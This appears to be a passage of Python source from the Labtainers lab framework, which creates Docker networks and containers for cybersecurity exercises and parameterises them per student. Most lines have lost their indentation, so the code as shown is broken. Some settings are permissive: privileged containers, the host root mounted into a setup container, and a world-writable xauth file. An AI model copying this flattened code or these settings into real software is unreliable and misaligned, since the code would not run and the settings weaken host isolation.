cmd = 'docker exec %s script -q -c "chown root:root /usr"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd_path = '/home/%s/.local/bin/parameterize.sh' % (container_user)
if container_password == "":
container_password = container_user
version = '0'
if image_info is None or image_info.version is None:
''' is a build, version -1 '''
version = '-1'
else:
#print(str(image_info))
if image_info.version is not None:
version = image_info.version
display = os.getenv('DISPLAY')
command=['docker', 'exec', '-i', running_container, cmd_path, container_user, container_password, lab_instance_seed, user_email, labname, mycontainer_name, version, display ]
logger.debug("About to call parameterize.sh with : %s" % str(command))
#return retval
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8')
if len(error_string) > 0:
for line in error_string.splitlines(True):
if not line.startswith('[sudo]') and "LC_ALL" not in line and "ENCRYPT_METHOD" not in line:
logger.error('ParameterizeMyContainer %s' % line)
retval = False
else:
logger.debug(line)
out_string = child.stdout.read().decode('utf-8').strip()
if len(out_string) > 0:
logger.debug('ParameterizeMyContainer %s' % out_string)
if mycontainer_image_name in networkImages:
cmd = "docker exec %s bash -c 'mkdir -p /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed mkdir of /run/sshd')
exit(1)
cmd = "docker exec %s bash -c 'chmod 0755 /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed chmod of /run/sshd')
exit(1)
else:
pass
return retval
def DoCmd(cmd):
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = True
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
retval = False
if len(output[0]) > 0:
logger.debug(output[0].decode('utf-8'))
return retval
# Start my_container_name container
def StartMyContainer(mycontainer_name):
retval = True
if IsContainerRunning(mycontainer_name):
logger.error("Container %s is already running!\n" % (mycontainer_name))
sys.exit(1)
command = "docker start %s" % mycontainer_name
#logger.debug("Command to execute is (%s)" % command)
if not DoCmd(command):
retval = False
return retval
def AllContainersCreated(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerCreated(clone_full):
return False
return True
# Check to see if my_container_name container has been created or not
def IsContainerCreated(mycontainer_name):
retval = True
command = "docker inspect -f {{.Created}} --type container %s" % mycontainer_name
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if result == FAILURE:
retval = False
logger.debug("Result of subprocess.call for %s IsContainerCreated is %s (1=>FAILURE)" % (mycontainer_name, result))
return retval
def GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name):
''' return the network address parameter and mac parameter for use in creating a container
or connecting the container to a network. Parse out mac address suffix if it exists,
and adjust the ip address based on clone numbers if the address has a "+CLONE" suffix '''
mac = ''
ip_param = ''
if ':' in mysubnet_ip:
mysubnet_ip, mac_addr = mysubnet_ip.split(':',1)
mac = '--mac-address=%s' % mac_addr
elif mysubnet_ip.lower() == 'auto_mac':
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
if not mysubnet_ip.lower().startswith('auto'):
if '+' in mysubnet_ip:
ip, clone_type = mysubnet_ip.split('+')
if clone_type.lower() == 'clone' or start_config.multi_user == 'clones':
name, role = mycontainer_name.rsplit('.',1)
dumb, offset = name.rsplit('-', 1)
try:
offset_int = int(offset)
except:
logger.error('expected use of clone, but did not find clone counter in %s' % mycontainer_name)
exit(1)
ip_start, ip_suffix = ip.rsplit('.', 1)
ip_suffix_int = int(ip_suffix)
new_suffix = ip_suffix_int + offset_int - 1
if new_suffix > 254:
logger.error('IP address adjusted to invalid value %d %s' % (new_suffix, mysubnet_ip))
exit(1)
ip_param = '--ip=%s.%d' % (ip_start, new_suffix)
elif clone_type.lower() == 'clone_mac' and start_config.multi_user == 'client':
# assuming we are a multiuser client
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
else:
print('ip %s' % ip)
ip_param = '--ip=%s' % ip
else:
ip_param = '--ip=%s' % mysubnet_ip
return ip_param, mac
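# Sketch of the '+CLONE' address arithmetic above (values are hypothetical):
# with mysubnet_ip '172.25.0.10+CLONE' and mycontainer_name 'telnet-3.student',
# the clone offset is 3, so ip_param becomes '--ip=172.25.0.12' (10 + 3 - 1).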
def ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip):
    logger.debug("Connecting additional network subnet to container %s" % mycontainer_name)
ip_param, dumb = GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name)
command = "docker network connect %s %s %s" % (ip_param, mysubnet_name, mycontainer_name)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call ConnectNetworkToContainer is %s" % result)
return result
def DisconnectNetworkFromContainer(mycontainer_name, mysubnet_name):
    logger.debug("Disconnecting network subnet from container %s" % mycontainer_name)
command = "docker network disconnect %s %s" % (mysubnet_name, mycontainer_name)
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
result = 0
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
        result = 1
return result
def SetXhost():
''' allow container root users to access xserver '''
cmd = 'xhost'
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if not 'LOCAL:' in output[0].decode('utf-8'):
cmd = 'xhost local:root'
os.system(cmd)
def GetContainerCloneNames(container):
''' populate dictionary with hostname/container names based on the quantity of clones
that are to be created '''
retval = {}
if container.clone_copies is None or container.clone == 1:
retval[container.full_name] = container.hostname
else:
try:
count = int(container.clone_copies)
except:
logger.error('bad clone value for %s' % container.hostname)
exit(1)
name, role = container.full_name.rsplit('.', 1)
for i in range(1, count+1):
hostname = '%s-%d' % (container.hostname, i)
fullname = '%s-%d.%s' % (name, i, role)
retval[fullname] = hostname
return retval
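# Example of the mapping produced above (hypothetical lab): a container with
# full_name 'mylab.server.student', hostname 'server' and clone_copies 2 yields
# {'mylab.server-1.student': 'server-1', 'mylab.server-2.student': 'server-2'}.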
def GetDNS_NMCLI():
dns_param = ''
dns_param = '--dns=8.8.8.8'
cmd="nmcli dev show | grep 'IP4.DNS'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[1].strip(), dns_param)
''' just take first '''
break
return dns_param
def GetDNS():
dns_param = ''
dns_param = '--dns=8.8.8.8'
labtainer_dns = os.getenv('LABTAINER_DNS')
if labtainer_dns is not None and len(labtainer_dns)>0:
dns_param = '--dns=%s %s' % (labtainer_dns.strip(), dns_param)
else:
cmd="systemd-resolve --status | grep 'DNS Servers:'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[2].strip(), dns_param)
''' just take first '''
break
else:
dns_param = GetDNS_NMCLI()
return dns_param
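# The resulting dns_param is a space-separated set of docker flags, e.g.
# '--dns=10.0.2.3 --dns=8.8.8.8' (host resolver first, 8.8.8.8 as a fallback);
# the addresses shown are only illustrative.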
def GetX11SSH():
''' EXPERIMENTAL, not used '''
ip = '192.168.1.222'
xauth = '/tmp/.docker.xauth'
#display = os.getenv('DISPLAY')
display = ':10'
cmd = 'xauth list %s' % display
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
parts = output[0].decode('utf-8').strip().split()
magic_cookie = parts[2]
else:
print('could not find magic cookie')
exit(1)
x11_port = display.split(':')[1]
#print('x11_port %s' % x11_port)
cmd = 'xauth -f /tmp/.docker.xauth add %s:%s . %s' % (ip, x11_port, magic_cookie)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
os.chmod(xauth, 0o777)
retval = '--env="%s:%s" -v %s:%s -e XAUTHORITY="%s"' % (ip, x11_port, xauth, xauth, xauth)
#retval = '--env="DISPLAY" -v %s:%s -e XAUTHORITY="%s"' % (xauth, xauth, xauth)
return retval
def isUbuntuSystemd(image_name):
    ''' NOTE side effect of updating the networkImages global '''
done = False
retval = None
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
#logger.debug('isUbuntuSystemd base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]
if base.startswith('"'):
base = base[1:]
if '/' in base and '/' in image_name:
my_registry = image_name.split('/')[0]
no_reg = base.split('/')[1]
base = '%s/%s' % (my_registry, no_reg)
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'sshd' in line or 'xinetd' in line:
net_image = image_name
if '/' in image_name:
net_image = image_name.split('/')[1]
if net_image not in networkImages:
networkImages.append(net_image)
if 'Labtainer base image from ubuntu-systemd' in line:
retval = 'ubuntu16'
if 'ubuntu20' in line:
retval = 'ubuntu20'
break
return retval
def isFirefox(image_name):
done = False
retval = False
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
#print('lab container cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
logger.debug('base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]+'"'
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'firefox' in line:
retval = True
break
return retval
def FindTap(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
if start_config.containers[container_name].tap.lower() == 'yes':
return container_name
return None
def FindTapMonitor(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
for subnet in start_config.containers[container_name].container_nets:
#logger.debug('FindTapMonitor check lan %s' % subnet)
if subnet.lower() == 'tap_lan':
ip = start_config.containers[container_name].container_nets[subnet]
return container_name, ip
return None, None
def HandleVolumes(volume, container):
for m in container.mounts:
logger.debug('adding volume mount %s' % m)
''' host volume is relative to ~/.local/share/labtainers, container relative to Home unless absolute '''
try:
hostv, containerv = m.split(':')
except:
            logger.error('Bad mount definition %s' % m)
exit(1)
homedir = os.environ['HOME']
host_path = os.path.join(homedir, '.local', 'share', 'labtainers', hostv)
if not os.path.isfile(host_path):
try:
os.mkdir(host_path)
except:
pass
container_path = os.path.join('/home', container.user, containerv)
volume = volume + ' -v %s:%s:rw' % (host_path, container_path)
return volume
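# Illustrative mount expansion (values are hypothetical): for container user
# 'ubuntu' and a mount entry 'mydata:work', the flag added is roughly
#   -v $HOME/.local/share/labtainers/mydata:/home/ubuntu/work:rw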
def checkSbin(lab_path, name):
sbin = os.path.join(lab_path, name, '_system','sbin')
if os.path.isdir(sbin) and not os.path.islink(sbin):
return False
else:
return True
def CreateSingleContainer(labtainer_config, start_config, container, lab_path, mysubnet_name=None, mysubnet_ip=None, quiet=False):
''' create a single container -- or all clones of that container per the start.config '''
retval = True
#image_exists, result, new_image_name = ImageExists(container.image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
logger.debug("Create Single Container for %s using registry %s" % (container.name, container_registry))
image_info = imageInfo(container.image_name, container_registry, base_registry, labtainer_config, quiet=quiet)
if image_info is None:
logger.error('Could not find image for %s' % container.image_name)
retval = False
else:
new_image_name = container.image_name
if not image_info.local_build:
new_image_name = '%s/%s' % (container_registry, container.image_name)
if not image_info.local:
pullDockerImage(container_registry, container.image_name)
docker0_IPAddr = getDocker0IPAddr()
logger.debug("getDockerIPAddr result (%s)" % docker0_IPAddr)
volume=''
ubuntu_systemd = isUbuntuSystemd(new_image_name)
if ubuntu_systemd is not None:
osTypeMap[container.image_name] = ubuntu_systemd
if ubuntu_systemd == 'ubuntu20':
if not checkSbin(lab_path, container.name):
logger.error('/sbin found in ubuntu20 container %s. Would be fatal, exiting.' % container.name)
return False
is_firefox = isFirefox(new_image_name)
if is_firefox:
shm = '--shm-size=2g'
else:
shm = ''
if container.script == '' or ubuntu_systemd is not None:
logger.debug('Container %s is systemd or has script empty <%s>' % (new_image_name, container.script))
''' a systemd container, centos or ubuntu? '''
if ubuntu_systemd == 'ubuntu16':
''' A one-off run to set some internal values. This is NOT what runs the lab container '''
#volume='--security-opt seccomp=confined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
volume='--security-opt seccomp=unconfined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
cmd = 'docker run --rm --privileged -v /:/host %s setup' % new_image_name
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('back from docker run, output %s' % (output[0].decode('utf-8')))
if len(output[1]) > 0:
logger.debug('back from docker run, error %s' % (output[1].decode('utf-8')))
volume = ''
elif ubuntu_systemd == 'ubuntu20':
volume = volume + " -v /sys/fs/cgroup:/sys/fs/cgroup:ro "
if container.x11.lower() == 'yes':
#volume = '-e DISPLAY -v /tmp/.Xll-unix:/tmp/.X11-unix --net=host -v$HOME/.Xauthority:/home/developer/.Xauthority'
#volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/tmp/.X11-unix:rw"'
volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/var/tmp/.X11-unix:rw"'
logger.debug('container using X11')
volume = HandleVolumes(volume, container)
if container.mystuff.lower() == 'yes':
here = os.getcwd()
mystuff_dir = os.path.join(here, 'mystuff')
myv = ' --volume="%s:/home/%s/mystuff:rw"' % (mystuff_dir, container.user)
volume = volume+myv
mystuff_dir = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','mystuff')
try:
os.mkdir(mystuff_dir)
except:
pass
#if container.thumb_volume is not None:
# volume = volume+' --volume="/dev:/dev:rw"'
# #volume = volume+' --device="/dev/sdb"'
add_hosts = ''
if "_" in container.name:
no_underscores = container.name.replace("_","")
add_hosts = '--add-host %s:127.0.0.1 ' % no_underscores
for item in container.add_hosts:
if ':' not in item:
if item in start_config.lan_hosts:
for entry in start_config.lan_hosts[item]:
if not entry.startswith(container.name):
add_this = '--add-host %s ' % entry
add_hosts += add_this
else:
logger.error('ADD-HOST entry in start.config missing colon: %s' % item)
                    logger.error('syntax: ADD-HOST <host>:<ip>')
return
else:
add_this = '--add-host %s ' % item
add_hosts += add_this
if docker0_IPAddr is not None:
add_host_param = '--add-host my_host:%s %s' % (docker0_IPAddr, add_hosts)
else:
add_host_param = add_hosts
if container.tap == 'yes':
''' docker fu when using host networking, sudo hangs looking for host ip? '''
add_host_param = '--add-host %s:127.0.0.1 %s' % (container.hostname, add_host_param)
monitor_tap, ip = FindTapMonitor(start_config)
if monitor_tap is not None:
add_host_param = '--add-host monitor_tap:%s %s' % (ip, add_host_param)
wait_tap_dir = GetWaitTapDir()
volume = '%s --volume %s:/tmp/wait_tap_dir' % (volume, wait_tap_dir)
dns_param = GetDNS()
priv_param = ''
if container.no_privilege != 'yes':
priv_param = '--privileged'
publish_param = ''
if container.publish is not None:
publish_param = '--publish %s' % container.publish
mac = ''
subnet_ip = ''
network_param = ''
if container.tap == 'yes':
network_param = '--network=host'
elif mysubnet_name is not None:
network_param = '--network=%s' % mysubnet_name
multi_user = ''
if container.client == 'yes' and start_config.multi_user is not None:
#print('use putenv to set %s' % start_config.multi_user)
os.putenv("DISTRIBUTED_LABTAINER", start_config.multi_user)
''' why does putenv not set the value? '''
os.environ['DISTRIBUTED_LABTAINER'] = start_config.multi_user
multi_user = '--env=DISTRIBUTED_LABTAINER'
num_cpu_str = ''
if container.num_cpus is not None:
num_cpu_str = '--cpus=%s' % container.num_cpus
cpu_set_str = ''
if container.cpu_set is not None:
cpu_set_str = '--cpuset-cpus=%s' % container.cpu_set
clone_names = GetContainerCloneNames(container)
for clone_fullname in clone_names:
clone_host = clone_names[clone_fullname]
if mysubnet_name is not None:
subnet_ip, mac = GetNetParam(start_config, mysubnet_name, mysubnet_ip, clone_fullname)
#createsinglecommand = "docker create -t %s --ipc host --cap-add NET_ADMIN %s %s %s %s %s --name=%s --hostname %s %s %s %s %s" % (dns_param,
if len(container.docker_args) == 0:
createsinglecommand = "docker create %s -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s %s %s" % \
(shm, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, num_cpu_str, cpu_set_str, new_image_name)
else:
createsinglecommand = "docker create %s %s --shm-size=2g -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s %s %s" % \
(shm, container.docker_args, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, num_cpu_str, cpu_set_str, new_image_name)
logger.debug("Command to execute was (%s)" % createsinglecommand)
ps = subprocess.Popen(shlex.split(createsinglecommand), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
logger.debug('command was %s' % createsinglecommand)
if 'Cannot connect to the Docker daemon' in output[1].decode('utf-8'):
print('\n\nERROR: Docker seems not to be running.')
print('Try "sudo systemctl restart docker"\n\n')
logger.error('CreateSingleContainer %s' % output[1].decode('utf-8'))
retval = False
break
#print('result of create %s' % output[0])
return retval
def GetIface(ip):
cmd = 'ifconfig | grep -B1 "inet addr:%s" | awk \'$1!="inet" && $1!="--" {print $1}\'' % ip
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
return output[0].decode('utf-8').strip()
def CheckPromisc(iface):
    cmd = "netstat -i | grep %s | awk '{print $12}'" % iface
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'P' in output[0].decode('utf-8'):
return True
else:
return False
# Create SUBNETS
def CreateSubnets(start_config):
has_tap = False
subnets = start_config.subnets
#for (subnet_name, subnet_network_mask) in networklist.iteritems():
for subnet_name in subnets:
subnet_network_mask = subnets[subnet_name].mask
logger.debug("subnet_name is %s" % subnet_name)
logger.debug("subnet_network_mask is %s" % subnet_network_mask)
if subnets[subnet_name].tap:
has_tap = True
command = "docker network inspect %s" % subnet_name
#logger.debug("Command to execute is (%s)" % command)
inspect_result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call CreateSubnets docker network inspect is %s" % inspect_result)
if inspect_result == FAILURE:
# Fail means does not exist - then we can create
macvlan = ''
ip_range = ''
net_type = 'bridge'
if subnets[subnet_name].macvlan_use is not None:
#iface = GetIface(subnets[subnet_name].macvlan)
iface = subnets[subnet_name].macvlan_use
if iface is None or len(iface) == 0:
                    logger.error("No IP assigned to network %s, assign an ip on Linux host to enable use of macvlan with Labtainers" % subnet_name)
exit(1)
if not CheckPromisc(iface):
logger.warning("network %s not in promisc mode, required for macvlan inter-vbox comms\nUse: sudo ifconfig %s promisc" % (iface, iface))
                macvlan = '-o parent=%s -o macvlan_mode=bridge' % iface
net_type = 'macvlan'
if subnets[subnet_name].ip_range is not None:
ip_range = '--ip-range %s' % subnets[subnet_name].ip_range
if subnets[subnet_name].gateway != None:
logger.debug(subnets[subnet_name].gateway)
subnet_gateway = subnets[subnet_name].gateway
command = "docker network create -d %s --gateway=%s --subnet %s %s %s %s" % (net_type, subnet_gateway, subnet_network_mask, macvlan, ip_range, subnet_name)
else:
command = "docker network create -d %s --subnet %s %s %s %s" % (net_type, subnet_network_mask, macvlan, ip_range, subnet_name)
#logger.debug("Command to execute is (%s)" % command)
#create_result = subprocess.call(command, shell=True)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("stdout of subprocess.call CreateSubnets docker network create is %s" % output[0].decode('utf-8'))
if len(output[1]) > 0:
logger.debug('stderr of %s is %s' % (command, output[1].decode('utf-8')))
found_match_network = False
found_match_network_name = ""
# Before a hard exit - give the user some indication of what to do next
# First check to see if a gateway is provided and it is already used
if 'no matching subnet' in output[1].decode('utf-8'):
logger.error('Config error: %s' % output[1].decode('utf-8'))
exit(1)
if subnets[subnet_name].gateway != None:
found_match_network, found_match_network_name = FindNetworkGivenGatewayIP(subnets[subnet_name].gateway)
# If Gateway IP address not okay, no need to check subnet anymore
if not found_match_network:
# Gateway IP address might be okay but subnet mask might not
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
else:
# No Gateway IP address, check the subnet mask only
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
# At this point, if still not found then just print error and exit
if not found_match_network:
logger.error("Failed to create %s subnet at %s, %s\n" % (subnet_name, subnet_network_mask, output[1].decode('utf-8')))
logger.error("command was %s\n" % command)
sys.exit(1)
else:
# Found either a network matching the Gateway IP address or matching subnet
lablist = []
# See if any lab is using that network
lablist = GetListLabContainerOnNetwork(found_match_network_name)
if lablist == []:
# No lab is using the network - tell user to remove that "left-over" network
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("Try removing the network with:")
logger.error("docker network rm %s" % found_match_network_name)
sys.exit(1)
else:
# There is lab using that network - tell user to stop that lab first
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("This may be due to a failure to stop a previous lab.")
logger.error("Please stop the lab %s and try again." % lablist)
sys.exit(1)
else:
logger.error("Already exists! Not creating %s subnet at %s!\n" % (subnet_name, subnet_network_mask))
return has_tap
def RemoveSubnets(subnets, ignore_stop_error):
for subnet_name in subnets:
command = "docker network rm %s" % subnet_name
logger.debug('command %s' % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
if ignore_stop_error:
logger.debug('Encountered error removing subnet %s' % subnet_name)
else:
logger.error('Encountered error removing subnet %s' % subnet_name)
EMAIL_TMP='./.tmp/email.txt'
def getHomeEmail():
    ''' compatibility for move of email to ~/.local/share/labtainers '''
homedir = os.environ['HOME']
lab_app = os.path.join(homedir,'.local', 'share', 'labtainers')
logger.debug('getHomeEmail lab_app %s' % lab_app)
try:
os.makedirs(lab_app)
except:
pass
email_path = os.path.join(lab_app, 'email.txt')
if not os.path.isfile(email_path):
logger.debug('getHomeEmail no email at %s' % email_path)
if os.path.isfile(EMAIL_TMP):
logger.debug('getHomeEmail copy from %s' % EMAIL_TMP)
shutil.copy(EMAIL_TMP, lab_app)
else:
if 'LABTAINER_DIR' in os.environ:
student_email = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','.tmp', 'email.txt')
if os.path.isfile(student_email):
shutil.copy(student_email, lab_app)
else:
logger.debug('No email found at %s' % student_email)
else:
logger.debug('LABTAINER_DIR not in env, no email path found')
return email_path
def getLastEmail():
retval = None
home_email = getHomeEmail()
if os.path.isfile(home_email):
with open(home_email) as fh:
retval = fh.read()
if retval is not None:
retval = retval.strip()
return retval
def putLastEmail(email):
home_email = getHomeEmail()
with open(home_email, 'w') as fh:
fh.write(email)
def GetLabSeed(lab_master_seed, student_email):
# Create hash using LAB_MASTER_SEED concatenated with user's e-mail
# LAB_MASTER_SEED is per laboratory - specified in start.config
string_to_be_hashed = '%s:%s' % (lab_master_seed, student_email)
mymd5 = hashlib.new('md5')
mymd5.update(string_to_be_hashed.encode('utf-8'))
mymd5_hex_string = mymd5.hexdigest()
return mymd5_hex_string
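# A minimal sketch of the derivation above (inputs are hypothetical): for master
# seed 'mylab_seed' and email 'student@example.com', the instance seed is the md5
# hex digest of 'mylab_seed:student@example.com', giving each student a stable,
# per-lab pseudo-random seed.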
#def ParamStartConfig(lab_seed):
def ParamForStudent(lab_master_seed, mycontainer_name, container, labname,
student_email, lab_path, name, image_info, num_containers, running_container=None):
# NOTE image_info may or may not be populated.
if running_container == None:
running_container = mycontainer_name
mymd5_hex_string = GetLabSeed(lab_master_seed, student_email)
logger.debug(mymd5_hex_string)
if container.wait_for is not None:
logger.debug('waiting for %s to finish parameterizing' % container.wait_for)
WaitStartSync(container.wait_for)
if not ParameterizeMyContainer(mycontainer_name, container.image_name, container.user,
container.password, mymd5_hex_string,
student_email, labname, lab_path, name, image_info, running_container):
logger.error("Failed to parameterize lab container %s!\n" % mycontainer_name)
sys.exit(1)
logger.debug('back from ParameterizeMyContainer for %s' % mycontainer_name)
CreateStartSync(container.name)
num_done = CountStartSync()
dockerPull.moveUp(1)
if num_done == num_containers:
progress = 'Started %d containers, %d completed initialization. Done.\n' % (num_containers, num_done)
else:
progress = 'Started %d containers, %d completed initialization, please wait...\n' % (num_containers, num_done)
dockerPull.clearLine()
sys.stdout.write(progress)
def DockerCmd(cmd, noloop=False, good_error=None):
ok = False
count = 0
if noloop:
count = 1000
while not ok:
#logger.debug("Command to execute is (%s)" % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
count += 1
err_string = output[1].decode('utf-8')
if good_error is not None and good_error in err_string:
#logger.debug("Failed cmd %s BUT got good error %s" % (cmd, good_error))
return True
logger.debug("Failed cmd %s %s" % (cmd, err_string))
if count > 1:
return False
time.sleep(1)
else:
ok = True
if len(output[0].decode('utf-8')) > 0:
logger.debug("cmd %s stdout: %s" % (cmd, output[0].decode('utf-8')))
out = output[0].decode('utf-8')
if 'unrecognized option' in out or 'Unexpected EOF' in out:
return False
return True
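# Illustrative call (container name is hypothetical): a benign failure can be
# whitelisted via good_error, e.g.
#   DockerCmd("docker exec mylab.client.student bash -c 'mkdir /tmp/foo'",
#             noloop=True, good_error='File exists')
# returns True if the command succeeds or fails only with that error text.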
def CopyInstrConfig(mycontainer_name, container_user, lab_path):
cmd = 'docker cp %s/instr_config/. %s:/home/%s/.local/instr_config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker cp %s/config/. %s:/home/%s/.local/config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
def CopyLabBin(mycontainer_name, mycontainer_image_name, container_user, lab_path, name, image_info):
here = os.path.dirname(os.path.abspath(__file__))
parent = os.path.dirname(here)
lab_bin_path = os.path.join(parent, 'lab_bin')
cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (lab_bin_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
''' TBD DO NOT move lab/config here -- would not catch the tar_list.txt files (skip list) '''
''' TBD perhaps move lab/_bin to here? would it save duplicate containers?'''
#container_bin = os.path.join(lab_path, name,'_bin')
#if os.path.isdir(container_bin):
# cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (container_bin, mycontainer_name, container_user)
# DockerCmd(cmd)
tmp_dir=os.path.join('/tmp/labtainers', mycontainer_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
capinout = os.path.join(parent, 'lab_sys', 'usr','sbin', 'capinout')
if not os.path.isfile(capinout):
print('\n\n********* ERROR ***********')
print('%s is missing. If this is a development system, you may need to' % capinout)
print('go to the tool-src/capinout directory and run ./mkit.sh')
''' Copy file to /lib and /sys. Account for sym link fu '''
dest_tar = os.path.join(tmp_dir, 'labsys.tar')
lab_sys_path = os.path.join(parent, 'lab_sys')
cmd = 'tar cf %s -C %s usr etc bin' % (dest_tar, lab_sys_path)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('tar failure %s result: %s' % (cmd, output[1].decode('utf-8')))
cmd = 'docker cp %s %s:/var/tmp/' % (dest_tar, mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#else:
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /usr/"' % (mycontainer_name)
